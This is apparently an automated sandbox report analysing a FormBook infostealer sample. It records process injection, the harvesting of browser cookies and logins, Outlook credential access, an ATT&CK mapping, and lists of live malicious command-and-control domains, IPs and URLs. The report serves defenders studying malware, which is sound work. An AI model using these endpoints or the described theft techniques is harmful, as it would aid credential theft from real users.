Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: NULL target: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\MRINFO.EXE

Thread register set: target process: 7764

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\MRINFO.EXE

Thread APC queued: target process: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Jump to behavior

Source: C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe	Process created: C:\Windows\SysWOW64\MRINFO.EXE "C:\Windows\SysWOW64\MRINFO.EXE"			Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: ZVRmRlsEcS.exe, 00000001.00000000.1823730538.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000001.00000002.4157445265.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000000.1977527142.00000000015E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ZVRmRlsEcS.exe, 00000001.00000000.1823730538.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000001.00000002.4157445265.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000000.1977527142.00000000015E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ZVRmRlsEcS.exe, 00000001.00000000.1823730538.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000001.00000002.4157445265.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000000.1977527142.00000000015E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: ZVRmRlsEcS.exe, 00000001.00000000.1823730538.0000000000E70000.00000002.00000001.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000001.00000002.4157445265.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000000.1977527142.00000000015E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.alWUxZvrvU.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\MRINFO.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\MRINFO.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\MRINFO.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.alWUxZvrvU.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	312 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
alWUxZvrvU.exe	63%	ReversingLabs	Win32.Backdoor.FormBook
alWUxZvrvU.exe	100%	Avira	TR/Crypt.ZPACK.Gen
alWUxZvrvU.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.avantfize.shop	188.114.97.3	true	true	unknown
www.sendly.digital	194.58.112.174	true	true	unknown
www.le-pier.online	217.76.128.34	true	true	unknown
www.mtmoriacolives.store	103.42.108.46	true	true	unknown
admaioraluxury.com	62.149.128.40	true	true	unknown
www.zippio.top	203.161.46.201	true	true	unknown
www.37wx.baby	209.146.101.85	true	true	unknown
yqcpbackzx.javalebogame004.com	185.99.134.9	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	unknown
www.alanshortz.buzz	161.97.168.245	true	true	unknown
www.tyc01054.top	unknown	unknown	true	unknown
www.admaioraluxury.com	unknown	unknown	true	unknown
www.gloryastore.site	unknown	unknown	true	unknown
www.trytalnts.online	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.mtmoriacolives.store/9qeb/	true	unknown
http://www.avantfize.shop/q8x9/	true	unknown
http://www.alanshortz.buzz/amgg/	true	unknown
http://www.gloryastore.site/xofx/	true	unknown
http://www.tyc01054.top/oesh/	true	unknown
http://www.zippio.top/x6m4/	true	unknown
http://www.admaioraluxury.com/sumy/	true	unknown
http://www.37wx.baby/ptpp/	true	unknown
http://www.le-pier.online/0cl8/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reg.ru	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.arsys.es?utm_source=parking&utm_medium=link&utm_campaign=arsys	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://www.gloryastore.site	ZVRmRlsEcS.exe, 00000006.00000002.4159427335.00000000053F4000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/servidores/cloud?utm_source=parking&utm_medium=link&utm_campaign=cloud	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/servidores/dedicados?utm_source=parking&utm_medium=link&utm_campaign=de	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.arsys.es/herramientas/sms?utm_source=parking&utm_medium=link&utm_campaign=sms	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/soluciones?utm_source=parking&utm_medium=link&utm_campaign=solutions	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/hosting/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_hos	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.admaioraluxury.com:80/sumy/?DX3L=8uNUhaiSR/1/jShpTjhrq7Pmn2ok3vFsrk	MRINFO.EXE, 00000003.00000002.4158117202.0000000003F16000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.00000000034E6000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/backup?utm_source=parking&utm_medium=link&utm_campaign=backup	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/hosting?utm_source=parking&utm_medium=link&utm_campaign=hosting	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/whois/?check=&dname=www.sendly.digital&reg_source=parking_auto	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/hosting/wordpress?utm_source=parking&utm_medium=link&utm_campaign=wordp	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/dominios/buscar?utm_source=parking&utm_medium=link&utm_campaign=dominio	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/domain/new/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/dominios/gestion?utm_source=parking&utm_medium=link&utm_campaign=resell	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/dominios/ssl?utm_source=parking&utm_medium=link&utm_campaign=ssl	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.sendly.digital&utm_medium=parking&utm_c	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js	MRINFO.EXE, 00000003.00000002.4158117202.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003CC0000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js	MRINFO.EXE, 00000003.00000002.4158117202.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003CC0000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/servidores/vps?utm_source=parking&utm_medium=link&utm_campaign=vps	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.arsys.es/crear/tienda?utm_source=parking&utm_medium=link&utm_campaign=tiendas	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js	MRINFO.EXE, 00000003.00000002.4158117202.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003CC0000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.arsys.es/partners?utm_source=parking&utm_medium=link&utm_campaign=partners	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/dominios?utm_source=parking&utm_medium=link&utm_campaign=dominios	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.arsys.es/herramientas/seo?utm_source=parking&utm_medium=link&utm_campaign=seo	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.arsys.es/correo?utm_source=parking&utm_medium=link&utm_campaign=correo	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css	MRINFO.EXE, 00000003.00000002.4158117202.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003CC0000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.sendly.digital&rand=	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/web-sites/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_c	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://arsys.es/css/parking2.css	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	MRINFO.EXE, 00000003.00000002.4159800756.0000000007C4A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.arsys.es/hosting/revendedores?utm_source=parking&utm_medium=link&utm_campaign=re	MRINFO.EXE, 00000003.00000002.4158117202.000000000423A000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.000000000380A000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/dedicated/?utm_source=www.sendly.digital&utm_medium=parking&utm_campaign=s_land_s	MRINFO.EXE, 00000003.00000002.4158117202.0000000003D84000.00000004.10000000.00040000.00000000.sdmp, ZVRmRlsEcS.exe, 00000006.00000002.4157888458.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2201906517.0000000013654000.00000004.80000000.00040000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
62.149.128.40	admaioraluxury.com	Italy	31034	ARUBA-ASNIT	true
209.146.101.85	www.37wx.baby	United States	395753	KKRUS	true
188.114.97.3	www.avantfize.shop	European Union	13335	CLOUDFLARENETUS	true
217.76.128.34	www.le-pier.online	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	true
185.99.134.9	yqcpbackzx.javalebogame004.com	Belarus	133448	CHGPL-AS-APKoreaHK	true
194.58.112.174	www.sendly.digital	Russian Federation	197695	AS-REGRU	true
103.42.108.46	www.mtmoriacolives.store	Australia	45638	SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	true
203.161.46.201	www.zippio.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
161.97.168.245	www.alanshortz.buzz	United States	51167	CONTABODE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1530769
Start date and time:	2024-10-10 14:11:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	alWUxZvrvU.exe renamed because original name is a hash value
Original Sample Name:	df0c29738d26225d66d84b875da95446c3a523c4ee1541714594f72991902868.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/1@11/10
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 86% Number of executed functions: 13 Number of non-executed functions: 325
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: alWUxZvrvU.exe

Simulations

Behavior and APIs

Time	Type	Description
08:12:56	API Interceptor	11866176x Sleep call for process: MRINFO.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
62.149.128.40	Arrival notice.exe	Get hash	malicious	FormBook	Browse	www.chalet-tofane.net/vv4m/?7NP=7FXXUPl&EZ2lo=YHtjADYkxu7EjL2CugAOyFkd+FKjIe5l/QKXGaE9Itky6wrTEgv0uDMpgH/UthNzfFIQLoI7VSX8KaEEAmnqI9GcxpfDY6d99mE8V8mh5Ak2zhlphg==
	SHIPPING_DOCUMENTS.VBS.vbs	Get hash	malicious	FormBook	Browse	www.chalet-tofane.net/obbp/
	List of Items0001.doc.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.chalet-tofane.net/ytc6/
	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	www.chalet-tofane.net/uesf/
	PO76389.exe	Get hash	malicious	FormBook	Browse	www.fimgroup.net/f3w9/
	bintoday1.exe	Get hash	malicious	FormBook	Browse	www.fimgroup.net/m3ft/
	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	www.fimgroup.net/fqzh/
	file No83293 PO & Specification.gz.exe	Get hash	malicious	FormBook	Browse	www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
	64MXEd79F1.exe	Get hash	malicious	FormBook	Browse	www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
	09090.exe	Get hash	malicious	FormBook	Browse	www.autoreediritto.com/aucq/?zFQHE=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&yF3=b0i4Y00xHtf
188.114.97.3	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/fxts/
	RRjzYVukzs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
